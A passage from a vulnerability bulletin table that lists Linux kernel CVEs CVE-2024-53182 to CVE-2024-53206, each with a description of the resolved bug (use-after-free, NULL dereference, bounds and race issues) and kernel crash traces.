400.355351] lookup_one_qstr_excl+0xef/0x150 [ 400.355357] do_unlinkat+0x22a/0x620 [ 400.355366] __x64_sys_unlinkat+0x109/0x1e0 [ 400.355375] do_syscall_64+0x82/0x160 [ 400.355384] entry_SYSCALL_64_after_hwframe+0x76/0x7 ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-53182 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: um: net: Do not use drvdata in release The drvdata is not available in release. Let's just use container_of() to get the uml_net instance. Otherwise, removing a network device will result in a crash: RIP: 0033:net_device_release+0x10/0x6f RSP: 00000000e20c7c40 EFLAGS: 00010206 RAX: 000000006002e4e7 RBX: 00000000600f1baf RCX: 00000000624074e0 RDX: 0000000062778000 RSI: 0000000060551c80 RDI: 00000000627af028 RBP: 00000000e20c7c50 R08: 00000000603ad594 R09: 00000000e20c7b70 R10: 000000000000135a R11: 00000000603ad422 R12: 0000000000000000 R13: 0000000062c7af00 R14: 0000000062406d60 R15: 00000000627700b6 Kernel panic - not syncing: Segfault with no mm CPU: 0 UID: 0 PID: 29 Comm: kworker/0:2 Not tainted 6.12.0-rc6-g59b723cd2adb #1 Workqueue: events mc_work_proc Stack: 627af028 62c7af00 e20c7c80 60276fcd 62778000 603f5820 627af028 00000000 e20c7cb0 603a2bcd 627af000 62770010 Call Trace: [<60276fcd>] device_release+0x70/0xba [<603a2bcd>] kobject_put+0xba/0xe7 [<60277265>] put_device+0x19/0x1c [<60281266>] platform_device_put+0x26/0x29 [<60281e5f>] platform_device_unregister+0x2c/0x2e [<6002ec9c>] net_remove+0x63/0x69 [<60031316>] ? mconsole_reply+0x0/0x50 [<600310c8>] mconsole_remove+0x160/0x1cc [<60087d40>] ? __remove_hrtimer+0x38/0x74 [<60087ff8>] ? hrtimer_try_to_cancel+0x8c/0x98 [<6006b3cf>] ? dl_server_stop+0x3f/0x48 [<6006b390>] ? dl_server_stop+0x0/0x48 [<600672e8>] ? dequeue_entities+0x327/0x390 [<60038fa6>] ? um_set_signals+0x0/0x43 [<6003070c>] mc_work_proc+0x77/0x91 [<60057664>] process_scheduled_works+0x1b3/0x2dd [<60055f32>] ? assign_work+0x0/0x58 [<60057f0a>] worker_thread+0x1e9/0x293 [<6005406f>] ? set_pf_worker+0x0/0x64 [<6005d65d>] ? arch_local_irq_save+0x0/0x2d [<6005d748>] ? kthread_exit+0x0/0x3a [<60057d21>] ? worker_thread+0x0/0x293 [<6005dbf1>] kthread+0x126/0x12b [<600219c5>] new_thread_handler+0x85/0xb6 | 2024-12-27 | not yet calculated | CVE-2024-53183 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: um: ubd: Do not use drvdata in release The drvdata is not available in release. Let's just use container_of() to get the ubd instance. Otherwise, removing a ubd device will result in a crash: RIP: 0033:blk_mq_free_tag_set+0x1f/0xba RSP: 00000000e2083bf0 EFLAGS: 00010246 RAX: 000000006021463a RBX: 0000000000000348 RCX: 0000000062604d00 RDX: 0000000004208060 RSI: 00000000605241a0 RDI: 0000000000000348 RBP: 00000000e2083c10 R08: 0000000062414010 R09: 00000000601603f7 R10: 000000000000133a R11: 000000006038c4bd R12: 0000000000000000 R13: 0000000060213a5c R14: 0000000062405d20 R15: 00000000604f7aa0 Kernel panic - not syncing: Segfault with no mm CPU: 0 PID: 17 Comm: kworker/0:1 Not tainted 6.8.0-rc3-00107-gba3f67c11638 #1 Workqueue: events mc_work_proc Stack: 00000000 604f7ef0 62c5d000 62405d20 e2083c30 6002c776 6002c755 600e47ff e2083c60 6025ffe3 04208060 603d36e0 Call Trace: [<6002c776>] ubd_device_release+0x21/0x55 [<6002c755>] ? ubd_device_release+0x0/0x55 [<600e47ff>] ? kfree+0x0/0x100 [<6025ffe3>] device_release+0x70/0xba [<60381d6a>] kobject_put+0xb5/0xe2 [<6026027b>] put_device+0x19/0x1c [<6026a036>] platform_device_put+0x26/0x29 [<6026ac5a>] platform_device_unregister+0x2c/0x2e [<6002c52e>] ubd_remove+0xb8/0xd6 [<6002bb74>] ? mconsole_reply+0x0/0x50 [<6002b926>] mconsole_remove+0x160/0x1cc [<6002bbbc>] ? mconsole_reply+0x48/0x50 [<6003379c>] ? um_set_signals+0x3b/0x43 [<60061c55>] ? update_min_vruntime+0x14/0x70 [<6006251f>] ? dequeue_task_fair+0x164/0x235 [<600620aa>] ? update_cfs_group+0x0/0x40 [<603a0e77>] ? __schedule+0x0/0x3ed [<60033761>] ? um_set_signals+0x0/0x43 [<6002af6a>] mc_work_proc+0x77/0x91 [<600520b4>] process_scheduled_works+0x1af/0x2c3 [<6004ede3>] ? assign_work+0x0/0x58 [<600527a1>] worker_thread+0x2f7/0x37a [<6004ee3b>] ? set_pf_worker+0x0/0x64 [<6005765d>] ? arch_local_irq_save+0x0/0x2d [<60058e07>] ? kthread_exit+0x0/0x3a [<600524aa>] ? worker_thread+0x0/0x37a [<60058f9f>] kthread+0x130/0x135 [<6002068e>] new_thread_handler+0x85/0xb6 | 2024-12-27 | not yet calculated | CVE-2024-53184 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: smb: client: fix NULL ptr deref in crypto_aead_setkey() Neither SMB3.0 or SMB3.02 supports encryption negotiate context, so when SMB2_GLOBAL_CAP_ENCRYPTION flag is set in the negotiate response, the client uses AES-128-CCM as the default cipher. See MS-SMB2 3.3.5.4. Commit b0abcd65ec54 ("smb: client: fix UAF in async decryption") added a @server->cipher_type check to conditionally call smb3_crypto_aead_allocate(), but that check would always be false as @server->cipher_type is unset for SMB3.02. Fix the following KASAN splat by setting @server->cipher_type for SMB3.02 as well. mount.cifs //srv/share /mnt -o vers=3.02,seal,... BUG: KASAN: null-ptr-deref in crypto_aead_setkey+0x2c/0x130 Read of size 8 at addr 0000000000000020 by task mount.cifs/1095 CPU: 1 UID: 0 PID: 1095 Comm: mount.cifs Not tainted 6.12.0 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-3.fc41 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x5d/0x80 ? crypto_aead_setkey+0x2c/0x130 kasan_report+0xda/0x110 ? crypto_aead_setkey+0x2c/0x130 crypto_aead_setkey+0x2c/0x130 crypt_message+0x258/0xec0 [cifs] ? __asan_memset+0x23/0x50 ? __pfx_crypt_message+0x10/0x10 [cifs] ? mark_lock+0xb0/0x6a0 ? hlock_class+0x32/0xb0 ? mark_lock+0xb0/0x6a0 smb3_init_transform_rq+0x352/0x3f0 [cifs] ? lock_acquire.part.0+0xf4/0x2a0 smb_send_rqst+0x144/0x230 [cifs] ? __pfx_smb_send_rqst+0x10/0x10 [cifs] ? hlock_class+0x32/0xb0 ? smb2_setup_request+0x225/0x3a0 [cifs] ? __pfx_cifs_compound_last_callback+0x10/0x10 [cifs] compound_send_recv+0x59b/0x1140 [cifs] ? __pfx_compound_send_recv+0x10/0x10 [cifs] ? __create_object+0x5e/0x90 ? hlock_class+0x32/0xb0 ? do_raw_spin_unlock+0x9a/0xf0 cifs_send_recv+0x23/0x30 [cifs] SMB2_tcon+0x3ec/0xb30 [cifs] ? __pfx_SMB2_tcon+0x10/0x10 [cifs] ? lock_acquire.part.0+0xf4/0x2a0 ? __pfx_lock_release+0x10/0x10 ? do_raw_spin_trylock+0xc6/0x120 ? lock_acquire+0x3f/0x90 ? _get_xid+0x16/0xd0 [cifs] ? __pfx_SMB2_tcon+0x10/0x10 [cifs] ? cifs_get_smb_ses+0xcdd/0x10a0 [cifs] cifs_get_smb_ses+0xcdd/0x10a0 [cifs] ? __pfx_cifs_get_smb_ses+0x10/0x10 [cifs] ? cifs_get_tcp_session+0xaa0/0xca0 [cifs] cifs_mount_get_session+0x8a/0x210 [cifs] dfs_mount_share+0x1b0/0x11d0 [cifs] ? __pfx___lock_acquire+0x10/0x10 ? __pfx_dfs_mount_share+0x10/0x10 [cifs] ? lock_acquire.part.0+0xf4/0x2a0 ? find_held_lock+0x8a/0xa0 ? hlock_class+0x32/0xb0 ? lock_release+0x203/0x5d0 cifs_mount+0xb3/0x3d0 [cifs] ? do_raw_spin_trylock+0xc6/0x120 ? __pfx_cifs_mount+0x10/0x10 [cifs] ? lock_acquire+0x3f/0x90 ? find_nls+0x16/0xa0 ? smb3_update_mnt_flags+0x372/0x3b0 [cifs] cifs_smb3_do_mount+0x1e2/0xc80 [cifs] ? __pfx_vfs_parse_fs_string+0x10/0x10 ? __pfx_cifs_smb3_do_mount+0x10/0x10 [cifs] smb3_get_tree+0x1bf/0x330 [cifs] vfs_get_tree+0x4a/0x160 path_mount+0x3c1/0xfb0 ? kasan_quarantine_put+0xc7/0x1d0 ? __pfx_path_mount+0x10/0x10 ? kmem_cache_free+0x118/0x3e0 ? user_path_at+0x74/0xa0 __x64_sys_mount+0x1a6/0x1e0 ? __pfx___x64_sys_mount+0x10/0x10 ? mark_held_locks+0x1a/0x90 do_syscall_64+0xbb/0x1d0 entry_SYSCALL_64_after_hwframe+0x77/0x7f | 2024-12-27 | not yet calculated | CVE-2024-53185 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix use-after-free in SMB request handling A race condition exists between SMB request handling in `ksmbd_conn_handler_loop()` and the freeing of `ksmbd_conn` in the workqueue handler `handle_ksmbd_work()`. This leads to a UAF. - KASAN: slab-use-after-free Read in handle_ksmbd_work - KASAN: slab-use-after-free in rtlock_slowlock_locked This race condition arises as follows: - `ksmbd_conn_handler_loop()` waits for `conn->r_count` to reach zero: `wait_event(conn->r_count_q, atomic_read(&conn->r_count) == 0);` - Meanwhile, `handle_ksmbd_work()` decrements `conn->r_count` using `atomic_dec_return(&conn->r_count)`, and if it reaches zero, calls `ksmbd_conn_free()`, which frees `conn`. - However, after `handle_ksmbd_work()` decrements `conn->r_count`, it may still access `conn->r_count_q` in the following line: `waitqueue_active(&conn->r_count_q)` or `wake_up(&conn->r_count_q)` This results in a UAF, as `conn` has already been freed. The discovery of this UAF can be referenced in the following PR for syzkaller's support for SMB requests. | 2024-12-27 | not yet calculated | CVE-2024-53186 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: io_uring: check for overflows in io_pin_pages WARNING: CPU: 0 PID: 5834 at io_uring/memmap.c:144 io_pin_pages+0x149/0x180 io_uring/memmap.c:144 CPU: 0 UID: 0 PID: 5834 Comm: syz-executor825 Not tainted 6.12.0-next-20241118-syzkaller #0 Call Trace: <TASK> __io_uaddr_map+0xfb/0x2d0 io_uring/memmap.c:183 io_rings_map io_uring/io_uring.c:2611 [inline] io_allocate_scq_urings+0x1c0/0x650 io_uring/io_uring.c:3470 io_uring_create+0x5b5/0xc00 io_uring/io_uring.c:3692 io_uring_setup io_uring/io_uring.c:3781 [inline] ... </TASK> io_pin_pages()'s uaddr parameter came directly from the user and can be garbage. Don't just add size to it as it can overflow. | 2024-12-27 | not yet calculated | CVE-2024-53187 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: fix crash when unbinding If there is an error during some initialization related to firmware, the function ath12k_dp_cc_cleanup is called to release resources. However this is released again when the device is unbinded (ath12k_pci), and we get: BUG: kernel NULL pointer dereference, address: 0000000000000020 at RIP: 0010:ath12k_dp_cc_cleanup.part.0+0xb6/0x500 [ath12k] Call Trace: ath12k_dp_cc_cleanup ath12k_dp_free ath12k_core_deinit ath12k_pci_remove ... The issue is always reproducible from a VM because the MSI addressing initialization is failing. In order to fix the issue, just set to NULL the released structure in ath12k_dp_cc_cleanup at the end. | 2024-12-27 | not yet calculated | CVE-2024-53188 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: nl80211: fix bounds checker error in nl80211_parse_sched_scan The channels array in the cfg80211_scan_request has a __counted_by attribute attached to it, which points to the n_channels variable. This attribute is used in bounds checking, and if it is not set before the array is filled, then the bounds sanitizer will issue a warning or a kernel panic if CONFIG_UBSAN_TRAP is set. This patch sets the size of allocated memory as the initial value for n_channels. It is updated with the actual number of added elements after the array is filled. | 2024-12-27 | not yet calculated | CVE-2024-53189 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: rtlwifi: Drastically reduce the attempts to read efuse in case of failures Syzkaller reported a hung task with uevent_show() on stack trace. That specific issue was addressed by another commit [0], but even with that fix applied (for example, running v6.12-rc5) we face another type of hung task that comes from the same reproducer [1]. By investigating that, we could narrow it to the following path: (a) Syzkaller emulates a Realtek USB WiFi adapter using raw-gadget and dummy_hcd infrastructure. (b) During the probe of rtl8192cu, the driver ends-up performing an efuse read procedure (which is related to EEPROM load IIUC), and here lies the issue: the function read_efuse() calls read_efuse_byte() many times, as loop iterations depending on the efuse size (in our example, 512 in total). This procedure for reading efuse bytes relies in a loop that performs an I/O read up to *10k* times in case of failures. We measured the time of the loop inside read_efuse_byte() alone, and in this reproducer (which involves the dummy_hcd emulation layer), it takes 15 seconds each. As a consequence, we have the driver stuck in its probe routine for big time, exposing a stack trace like below if we attempt to reboot the system, for example: task:kworker/0:3 state:D stack:0 pid:662 tgid:662 ppid:2 flags:0x00004000 Workqueue: usb_hub_wq hub_event Call Trace: __schedule+0xe22/0xeb6 schedule_timeout+0xe7/0x132 __wait_for_common+0xb5/0x12e usb_start_wait_urb+0xc5/0x1ef ? usb_alloc_urb+0x95/0xa4 usb_control_msg+0xff/0x184 _usbctrl_vendorreq_sync+0xa0/0x161 _usb_read_sync+0xb3/0xc5 read_efuse_byte+0x13c/0x146 read_efuse+0x351/0x5f0 efuse_read_all_map+0x42/0x52 rtl_efuse_shadow_map_update+0x60/0xef rtl_get_hwinfo+0x5d/0x1c2 rtl92cu_read_eeprom_info+0x10a/0x8d5 ? rtl92c_read_chip_version+0x14f/0x17e rtl_usb_probe+0x323/0x851 usb_probe_interface+0x278/0x34b really_probe+0x202/0x4a4 __driver_probe_device+0x166/0x1b2 driver_probe_device+0x2f/0xd8 [...] We propose hereby to drastically reduce the attempts of doing the I/O reads in case of failures, restricted to USB devices (given that they're inherently slower than PCIe ones). By retrying up to 10 times (instead of 10000), we got reponsiveness in the reproducer, while seems reasonable to believe that there's no sane USB device implementation in the field requiring this amount of retries at every I/O read in order to properly work. Based on that assumption, it'd be good to have it backported to stable but maybe not since driver implementation (the 10k number comes from day 0), perhaps up to 6.x series makes sense. [0] Commit 15fffc6a5624 ("driver core: Fix uevent_show() vs driver detach race") [1] A note about that: this syzkaller report presents multiple reproducers that differs by the type of emulated USB device. For this specific case, check the entry from 2024/08/08 06:23 in the list of crashes; the C repro is available at https://syzkaller.appspot.com/text?tag=ReproC&x=1521fc83980000. | 2024-12-27 | not yet calculated | CVE-2024-53190 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: fix warning when unbinding If there is an error during some initialization related to firmware, the buffers dp->tx_ring[i].tx_status are released. However this is released again when the device is unbinded (ath12k_pci), and we get: WARNING: CPU: 0 PID: 2098 at mm/slub.c:4689 free_large_kmalloc+0x4d/0x80 Call Trace: free_large_kmalloc ath12k_dp_free ath12k_core_deinit ath12k_pci_remove ... The issue is always reproducible from a VM because the MSI addressing initialization is failing. In order to fix the issue, just set the buffers to NULL after releasing in order to avoid the double free. | 2024-12-27 | not yet calculated | CVE-2024-53191 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: clk: clk-loongson2: Fix potential buffer overflow in flexible-array member access Flexible-array member `hws` in `struct clk_hw_onecell_data` is annotated with the `counted_by()` attribute. This means that when memory is allocated for this array, the _counter_, which in this case is member `num` in the flexible structure, should be set to the maximum number of elements the flexible array can contain, or fewer. In this case, the total number of elements for the flexible array is determined by variable `clks_num` when allocating heap space via `devm_kzalloc()`, as shown below: 289 struct loongson2_clk_provider *clp; ... 296 for (p = data; p->name; p++) 297 clks_num++; 298 299 clp = devm_kzalloc(dev, struct_size(clp, clk_data.hws, clks_num), 300 GFP_KERNEL); So, `clp->clk_data.num` should be set to `clks_num` or less, and not exceed `clks_num`, as is currently the case. Otherwise, if data is written into `clp->clk_data.hws[clks_num]`, the instrumentation provided by the compiler won't detect the overflow, leading to a memory corruption bug at runtime. Fix this issue by setting `clp->clk_data.num` to `clks_num`. | 2024-12-27 | not yet calculated | CVE-2024-53192 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: clk: clk-loongson2: Fix memory corruption bug in struct loongson2_clk_provider Some heap space is allocated for the flexible structure `struct clk_hw_onecell_data` and its flexible-array member `hws` through the composite structure `struct loongson2_clk_provider` in function `loongson2_clk_probe()`, as shown below: 289 struct loongson2_clk_provider *clp; ... 296 for (p = data; p->name; p++) 297 clks_num++; 298 299 clp = devm_kzalloc(dev, struct_size(clp, clk_data.hws, clks_num), 300 GFP_KERNEL); Then some data is written into the flexible array: 350 clp->clk_data.hws[p->id] = hw; This corrupts `clk_lock`, which is the spinlock variable immediately following the `clk_data` member in `struct loongson2_clk_provider`: struct loongson2_clk_provider { void __iomem *base; struct device *dev; struct clk_hw_onecell_data clk_data; spinlock_t clk_lock; /* protect access to DIV registers */ }; The problem is that the flexible structure is currently placed in the middle of `struct loongson2_clk_provider` instead of at the end. Fix this by moving `struct clk_hw_onecell_data clk_data;` to the end of `struct loongson2_clk_provider`. Also, add a code comment to help prevent this from happening again in case new members are added to the structure in the future. This change also fixes the following -Wflex-array-member-not-at-end warning: drivers/clk/clk-loongson2.c:32:36: warning: structure containing a flexible array member is not at the end of another structure [-Wflex-array-member-not-at-end] | 2024-12-27 | not yet calculated | CVE-2024-53193 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: PCI: Fix use-after-free of slot->bus on hot remove Dennis reports a boot crash on recent Lenovo laptops with a USB4 dock. Since commit 0fc70886569c ("thunderbolt: Reset USB4 v2 host router") and commit 59a54c5f3dbd ("thunderbolt: Reset topology created by the boot firmware"), USB4 v2 and v1 Host Routers are reset on probe of the thunderbolt driver. The reset clears the Presence Detect State and Data Link Layer Link Active bits at the USB4 Host Router's Root Port and thus causes hot removal of the dock. The crash occurs when pciehp is unbound from one of the dock's Downstream Ports: pciehp creates a pci_slot on bind and destroys it on unbind. The pci_slot contains a pointer to the pci_bus below the Downstream Port, but a reference on that pci_bus is never acquired. The pci_bus is destroyed before the pci_slot, so a use-after-free ensues when pci_slot_release() accesses slot->bus. In principle this should not happen because pci_stop_bus_device() unbinds pciehp (and therefore destroys the pci_slot) before the pci_bus is destroyed by pci_remove_bus_device(). However the stacktrace provided by Dennis shows that pciehp is unbound from pci_remove_bus_device() instead of pci_stop_bus_device(). To understand the significance of this, one needs to know that the PCI core uses a two step process to remove a portion of the hierarchy: It first unbinds all drivers in the sub-hierarchy in pci_stop_bus_device() and then actually removes the devices in pci_remove_bus_device(). There is no precaution to prevent driver binding in-between pci_stop_bus_device() and pci_remove_bus_device(). In Dennis' case, it seems removal of the hierarchy by pciehp races with driver binding by pci_bus_add_devices(). pciehp is bound to the Downstream Port after pci_stop_bus_device() has run, so it is unbound by pci_remove_bus_device() instead of pci_stop_bus_device(). Because the pci_bus has already been destroyed at that point, accesses to it result in a use-after-free. One might conclude that driver binding needs to be prevented after pci_stop_bus_device() has run. However it seems risky that pci_slot points to pci_bus without holding a reference. Solely relying on correct ordering of driver unbind versus pci_bus destruction is certainly not defensive programming. If pci_slot has a need to access data in pci_bus, it ought to acquire a reference. Amend pci_create_slot() accordingly. Dennis reports that the crash is not reproducible with this change. Abridged stacktrace: pcieport 0000:00:07.0: PME: Signaling with IRQ 156 pcieport 0000:00:07.0: pciehp: Slot #12 AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Interlock- NoCompl+ IbPresDis- LLActRep+ pci_bus 0000:20: dev 00, created physical slot 12 pcieport 0000:00:07.0: pciehp: Slot(12): Card not present ... pcieport 0000:21:02.0: pciehp: pcie_disable_notification: SLOTCTRL d8 write cmd 0 Oops: general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] PREEMPT SMP NOPTI CPU: 13 UID: 0 PID: 134 Comm: irq/156-pciehp Not tainted 6.11.0-devel+ #1 RIP: 0010:dev_driver_string+0x12/0x40 pci_destroy_slot pciehp_remove pcie_port_remove_service device_release_driver_internal bus_remove_device device_del device_unregister remove_iter device_for_each_child pcie_portdrv_remove pci_device_remove device_release_driver_internal bus_remove_device device_del pci_remove_bus_device (recursive invocation) pci_remove_bus_device pciehp_unconfigure_device pciehp_disable_slot pciehp_handle_presence_or_link_change pciehp_ist | 2024-12-27 | not yet calculated | CVE-2024-53194 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: Get rid of userspace_irqchip_in_use Improper use of userspace_irqchip_in_use led to syzbot hitting the following WARN_ON() in kvm_timer_update_irq(): WARNING: CPU: 0 PID: 3281 at arch/arm64/kvm/arch_timer.c:459 kvm_timer_update_irq+0x21c/0x394 Call trace: kvm_timer_update_irq+0x21c/0x394 arch/arm64/kvm/arch_timer.c:459 kvm_timer_vcpu_reset+0x158/0x684 arch/arm64/kvm/arch_timer.c:968 kvm_reset_vcpu+0x3b4/0x560 arch/arm64/kvm/reset.c:264 kvm_vcpu_set_target arch/arm64/kvm/arm.c:1553 [inline] kvm_arch_vcpu_ioctl_vcpu_init arch/arm64/kvm/arm.c:1573 [inline] kvm_arch_vcpu_ioctl+0x112c/0x1b3c arch/arm64/kvm/arm.c:1695 kvm_vcpu_ioctl+0x4ec/0xf74 virt/kvm/kvm_main.c:4658 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:907 [inline] __se_sys_ioctl fs/ioctl.c:893 [inline] __arm64_sys_ioctl+0x108/0x184 fs/ioctl.c:893 __invoke_syscall arch/arm64/kernel/syscall.c:35 [inline] invoke_syscall+0x78/0x1b8 arch/arm64/kernel/syscall.c:49 el0_svc_common+0xe8/0x1b0 arch/arm64/kernel/syscall.c:132 do_el0_svc+0x40/0x50 arch/arm64/kernel/syscall.c:151 el0_svc+0x54/0x14c arch/arm64/kernel/entry-common.c:712 el0t_64_sync_handler+0x84/0xfc arch/arm64/kernel/entry-common.c:730 el0t_64_sync+0x190/0x194 arch/arm64/kernel/entry.S:598 The following sequence led to the scenario: - Userspace creates a VM and a vCPU. - The vCPU is initialized with KVM_ARM_VCPU_PMU_V3 during KVM_ARM_VCPU_INIT. - Without any other setup, such as vGIC or vPMU, userspace issues KVM_RUN on the vCPU. Since the vPMU is requested, but not setup, kvm_arm_pmu_v3_enable() fails in kvm_arch_vcpu_run_pid_change(). As a result, KVM_RUN returns after enabling the timer, but before incrementing 'userspace_irqchip_in_use': kvm_arch_vcpu_run_pid_change() ret = kvm_arm_pmu_v3_enable() if (!vcpu->arch.pmu.created) return -EINVAL; if (ret) return ret; [...] if (!irqchip_in_kernel(kvm)) static_branch_inc(&userspace_irqchip_in_use); - Userspace ignores the error and issues KVM_ARM_VCPU_INIT again. Since the timer is already enabled, control moves through the following flow, ultimately hitting the WARN_ON(): kvm_timer_vcpu_reset() if (timer->enabled) kvm_timer_update_irq() if (!userspace_irqchip()) ret = kvm_vgic_inject_irq() ret = vgic_lazy_init() if (unlikely(!vgic_initialized(kvm))) if (kvm->arch.vgic.vgic_model != KVM_DEV_TYPE_ARM_VGIC_V2) return -EBUSY; WARN_ON(ret); Theoretically, since userspace_irqchip_in_use's functionality can be simply replaced by '!irqchip_in_kernel()', get rid of the static key to avoid the mismanagement, which also helps with the syzbot issue. | 2024-12-27 | not yet calculated | CVE-2024-53195 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: Don't retire aborted MMIO instruction Returning an abort to the guest for an unsupported MMIO access is a documented feature of the KVM UAPI. Nevertheless, it's clear that this plumbing has seen limited testing, since userspace can trivially cause a WARN in the MMIO return: WARNING: CPU: 0 PID: 30558 at arch/arm64/include/asm/kvm_emulate.h:536 kvm_handle_mmio_return+0x46c/0x5c4 arch/arm64/include/asm/kvm_emulate.h:536 Call trace: kvm_handle_mmio_return+0x46c/0x5c4 arch/arm64/include/asm/kvm_emulate.h:536 kvm_arch_vcpu_ioctl_run+0x98/0x15b4 arch/arm64/kvm/arm.c:1133 kvm_vcpu_ioctl+0x75c/0xa78 virt/kvm/kvm_main.c:4487 __do_sys_ioctl fs/ioctl.c:51 [inline] __se_sys_ioctl fs/ioctl.c:893 [inline] __arm64_sys_ioctl+0x14c/0x1c8 fs/ioctl.c:893 __invoke_syscall arch/arm64/kernel/syscall.c:35 [inline] invoke_syscall+0x98/0x2b8 arch/arm64/kernel/syscall.c:49 el0_svc_common+0x1e0/0x23c arch/arm64/kernel/syscall.c:132 do_el0_svc+0x48/0x58 arch/arm64/kernel/syscall.c:151 el0_svc+0x38/0x68 arch/arm64/kernel/entry-common.c:712 el0t_64_sync_handler+0x90/0xfc arch/arm64/kernel/entry-common.c:730 el0t_64_sync+0x190/0x194 arch/arm64/kernel/entry.S:598 The splat is complaining that KVM is advancing PC while an exception is pending, i.e. that KVM is retiring the MMIO instruction despite a pending synchronous external abort. Womp womp. Fix the glaring UAPI bug by skipping over all the MMIO emulation in case there is a pending synchronous exception. Note that while userspace is capable of pending an asynchronous exception (SError, IRQ, or FIQ), it is still safe to retire the MMIO instruction in this case as (1) they are by definition asynchronous, and (2) KVM relies on hardware support for pending/delivering these exceptions instead of the software state machine for advancing PC. | 2024-12-27 | not yet calculated | CVE-2024-53196 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Fix potential out-of-bound accesses for Extigy and Mbox devices A bogus device can provide a bNumConfigurations value that exceeds the initial value used in usb_get_configuration for allocating dev->config. This can lead to out-of-bounds accesses later, e.g. in usb_destroy_configuration. | 2024-12-27 | not yet calculated | CVE-2024-53197 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: xen: Fix the issue of resource not being properly released in xenbus_dev_probe() This patch fixes an issue in the function xenbus_dev_probe(). In the xenbus_dev_probe() function, within the if (err) branch at line 313, the program incorrectly returns err directly without releasing the resources allocated by err = drv->probe(dev, id). As the return value is non-zero, the upper layers assume the processing logic has failed. However, the probe operation was performed earlier without a corresponding remove operation. Since the probe actually allocates resources, failing to perform the remove operation could lead to problems. To fix this issue, we followed the resource release logic of the xenbus_dev_remove() function by adding a new block fail_remove before the fail_put block. After entering the branch if (err) at line 313, the function will use a goto statement to jump to the fail_remove block, ensuring that the previously acquired resources are correctly released, thus preventing the reference count leak. This bug was identified by an experimental static analysis tool developed by our team. The tool specializes in analyzing reference count operations and detecting potential issues where resources are not properly managed. In this case, the tool flagged the missing release operation as a potential problem, which led to the development of this patch. | 2024-12-27 | not yet calculated | CVE-2024-53198 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ASoC: imx-audmix: Add NULL check in imx_audmix_probe devm_kasprintf() can return a NULL pointer on failure,but this returned value in imx_audmix_probe() is not checked. Add NULL check in imx_audmix_probe(), to handle kernel NULL pointer dereference error. | 2024-12-27 | not yet calculated | CVE-2024-53199 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix null check for pipe_ctx->plane_state in hwss_setup_dpp This commit addresses a null pointer dereference issue in hwss_setup_dpp(). The issue could occur when pipe_ctx->plane_state is null. The fix adds a check to ensure `pipe_ctx->plane_state` is not null before accessing. This prevents a null pointer dereference. | 2024-12-27 | not yet calculated | CVE-2024-53200 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix null check for pipe_ctx->plane_state in dcn20_program_pipe This commit addresses a null pointer dereference issue in dcn20_program_pipe(). Previously, commit 8e4ed3cf1642 ("drm/amd/display: Add null check for pipe_ctx->plane_state in dcn20_program_pipe") partially fixed the null pointer dereference issue. However, in dcn20_update_dchubp_dpp(), the variable pipe_ctx is passed in, and plane_state is accessed again through pipe_ctx. Multiple if statements directly call attributes of plane_state, leading to potential null pointer dereference issues. This patch adds necessary null checks to ensure stability. | 2024-12-27 | not yet calculated | CVE-2024-53201 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: firmware_loader: Fix possible resource leak in fw_log_firmware_info() The alg instance should be released under the exception path, otherwise there may be resource leak here. To mitigate this, free the alg instance with crypto_free_shash when kmalloc fails. | 2024-12-27 | not yet calculated | CVE-2024-53202 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: usb: typec: fix potential array underflow in ucsi_ccg_sync_control() The "command" variable can be controlled by the user via debugfs. The worry is that if con_index is zero then "&uc->ucsi->connector[con_index - 1]" would be an array underflow. | 2024-12-27 | not yet calculated | CVE-2024-53203 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: phy: realtek: usb: fix NULL deref in rtk_usb3phy_probe In rtk_usb3phy_probe() devm_kzalloc() may return NULL but this returned value is not checked. | 2024-12-27 | not yet calculated | CVE-2024-53204 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: phy: realtek: usb: fix NULL deref in rtk_usb2phy_probe In rtk_usb2phy_probe() devm_kzalloc() may return NULL but this returned value is not checked. | 2024-12-27 | not yet calculated | CVE-2024-53205 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: tcp: Fix use-after-free of nreq in reqsk_timer_handler(). The cited commit replaced inet_csk_reqsk_queue_drop_and_put() with __inet_csk_reqsk_queue_drop() and reqsk_put() in reqsk_timer_handler(). Then, oreq should be passed to reqsk_put() instead of req; otherwise use-after-free of nreq could happen when reqsk is migrated but the retry attempt failed (e.g. due to timeout). Let's pass oreq to reqsk_put(). | 2024-12-27 | not yet calculated | CVE-2024-53206 |
| n/a -- n/a |
